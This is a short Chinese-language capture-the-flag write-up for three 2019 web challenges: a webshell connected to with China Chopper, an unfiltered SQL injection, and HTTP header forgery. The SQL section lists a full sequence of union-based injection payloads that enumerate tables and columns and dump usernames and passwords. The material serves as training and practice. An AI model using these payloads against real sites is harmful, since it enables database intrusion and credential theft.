2.7 [极客大挑战 2019]Knife&LoveSQL&Http

Knife

题目提示找到shell,shell密码都给了,直接用菜刀连接,得到flag。


LoveSQL

简单的sql注入题目,没用任何过滤机制。所以使用最简单的sql注入语句即可。
payload:

1
2
3
4
5
6
7
8
and 1=1 --+
and 1=2 --+
order by 3 --+
union select 1,2,3 --+
union select 1,database(),version() --+
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
union select 1,username,password from users limit 0,1--+ or (union select 1,2,group_concat(concat_ws(':',username,password)) from users --+)

将对应的表名换成题目中的表名即可


Http

这道题目主要考察http头部信息的理解和利用。
首先查看源码找到Secret.php

接下来就是https头部的构造了,如图构造了三个http头部信息:User-Agent;Referer;X-Forwared-For。

#
Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×